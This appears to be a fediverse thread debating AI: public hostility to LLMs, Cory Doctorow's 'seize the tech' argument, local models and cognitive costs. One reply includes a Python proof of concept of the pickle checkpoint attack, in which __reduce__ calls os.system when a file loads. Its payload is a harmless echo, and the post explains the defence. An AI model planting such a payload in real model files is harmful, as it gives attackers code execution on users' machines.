@marcel
Cool, I guess you could block and mute half the fediverse if that's what you'd rather.
Or maybe they've already done it to you and I'm just now realising why. Every day's a learning day!
@marcel
lol, here is leagues more 'emotional and black-and-white' by that particular metric.
the truth is that this is just the world now. it's how a *lot* of people genuinely feel about AI; there's no cleanly waving them away as unreasonable and emotional. well, anyway, I like your posts here, but be prepared for a minor or major shitstorm anytime AI comes up.
@chfour
67, no, obviously not.
The attention economy, well yeah, it is different. It's not limited to the younger generation; if anything, older people seem worse.
Is it really a problem to be concerned about the effects that extremely addictive and disruptive digital platforms might have on children?
Things are actually getting worse and it won't necessarily turn out to be okay just because we adapted to other things in the past.
@komali_2 @xgranade
Of course any such potential usage is a minefield of issues, but this has me thinking.
Because if (keyword being *if*) there were such a usage, that might give some credence to Cory's call to seize the tech, so that we might employ it without dependence on the hostile entities which control it.
Is it wrong to say we really ought to have our own versions of these tools, just in case? Maybe they really will turn out to be useless. But we surely cannot have exhausted all possibilities already, especially with our limited access to these tools.
If a use case like that is found, we'd better be able to control it. An anti-stylometry tool we don't fully control would be an absolute disaster... I've heard of attacks embedded in the weights.
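For what it's worth, the best-known version of that kind of attack doesn't even need the weight values themselves: classic pickle-based checkpoint formats execute arbitrary code at load time. A minimal sketch of that generic vector (the file name is made up, and this isn't any specific incident):

```python
# Sketch of the classic pickle-deserialisation attack in a "weights" file.
import pickle


class EvilPayload:
    # pickle calls __reduce__ when deserialising, so an attacker can make
    # the act of loading a checkpoint run an arbitrary command.
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned: this ran just by loading the file",))


# The attacker ships the payload alongside (or instead of) real tensors...
with open("model_checkpoint.pkl", "wb") as f:
    pickle.dump({"weights": EvilPayload()}, f)

# ...and the victim's innocent-looking load call executes it.
with open("model_checkpoint.pkl", "rb") as f:
    checkpoint = pickle.load(f)  # runs the attacker's command
```

Formats like safetensors close off that particular hole, but a backdoor trained into the weight values themselves is a separate and much harder detection problem, which is rather the point about needing control.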
@glyph
I wasn't sure about this thread at first but I think it actually has a fair point:
(https://hci.social/@fasterandworse/116104437434039067)
I do think Cory's imperative to 'seize' the tech is dubious. Firstly because without open weights we're hardly there; any experimentation is very limited, and the models we'd use are permanently stuck in place (which raises the concern that embedding tools built on open models but closed weights into our workflows would induce a kind of material dependency on unethical LLM production after all). But more pressingly, it implies that LLMs are somehow inherently valuable and that controlling them would indeed allow us to leap ahead and replace the proprietary models. What if there's nothing to replace and we're better off rejecting the technology?
Still, I think there might be edge cases, or unexpectedly useful areas of application, big or small. Like spellcheck and transcription: it has many issues, but maybe it's the best we've got until something else comes along. Or maybe not.
Cory Doctorow's ultimate crooked point is that you're fucked if you don't embrace AI. Local models, whatever. He compares technologies that have been proven valuable with a product that is merely predicted to be valuable. It's a variation on the assumption that everyone who hates AI just hasn't *tried* it: if only they'd give it a chance, they wouldn't be left behind.
@glyph
The idea of spellchecking and grammatical standards themselves could be criticised, as could the way LLM use affects our cognitive abilities. But I'm not yet seeing a critique that totally eclipses the possibility that such experimentation might yield an unexpected result?
(of course I'm strictly assuming such experimentation can be done with reasonable sustainability and doesn't involve the current ethical issues in training new LLMs, and I think Cory's current use case *probably* fits within those parameters)
@glyph
Still, I think that despite the existence of an emerging argument comprehensively against LLM tech (not just the critiques limited to big tech's use of LLMs), it's still based on what we know about the tech right now. Are we not ultimately limited by our lack of experience? We surely haven't exhausted the possibilities of experimentation with this still-new technology, and furthermore our ability to experiment thus far has been limited by the proprietary status of the models and weights, as well as the hardware requirements inherent to the training process.
I get that a lot of people are uninterested in such experimentation or see it as fruitless, and they may end up being right. But why shouldn't Cory or others be able to experiment and experience different possibilities for their workflow, to see how it affects them?
@glyph
Of course LLMs have certain biases and hallucinations, but the pre-existing tech also has its own patterns of distortions and false positives (Cory claims improvement here: that the LLM produces fewer false positives). The question, it seems to me, is whether the problems inherent to LLMs, things like the tendency to 'hallucinate' and their unreliable, nondeterministic nature, do in fact justify the position that LLM use is fruitless or even harmful in those applications.
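As a tangent, to make the nondeterminism point concrete, here's a toy sketch (hypothetical logits, nothing to do with Cory's actual setup) of why sampling-based decoding can return a different answer on every run, where a rule-based checker never would:

```python
# Toy illustration: sampling from a token distribution is nondeterministic.
import math
import random

# Hypothetical next-token logits for some prompt.
logits = {"mat": 2.0, "rug": 1.5, "roof": 0.5}


def sample_next_token(logits, temperature=1.0):
    # Softmax with temperature, then a weighted random choice.
    # With temperature > 0, repeated calls can return different tokens;
    # a deterministic rule-based checker has no equivalent behaviour.
    weights = {t: math.exp(v / temperature) for t, v in logits.items()}
    total = sum(weights.values())
    r = random.random() * total
    for token, w in weights.items():
        r -= w
        if r <= 0:
            return token
    return token  # fallback for floating-point edge cases


print([sample_next_token(logits) for _ in range(5)])  # varies run to run
```

(Greedy decoding, always taking the most likely token, is deterministic, but sampling with temperature > 0 is the common default in deployed chat-style LLMs.)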
I think I do lean toward the position that there is something fundamental about LLM tech, applying even in a locally hosted, open-source context, that does in fact cause problems: there's something about ceding human agency in such a way that disrupts our cognitive abilities in a bad tradeoff. It's obvious with excessive use, but I do wonder if it applies even in very minor cases. I look forward to reading your article critiquing locally hosted LLMs specifically, if you do write it.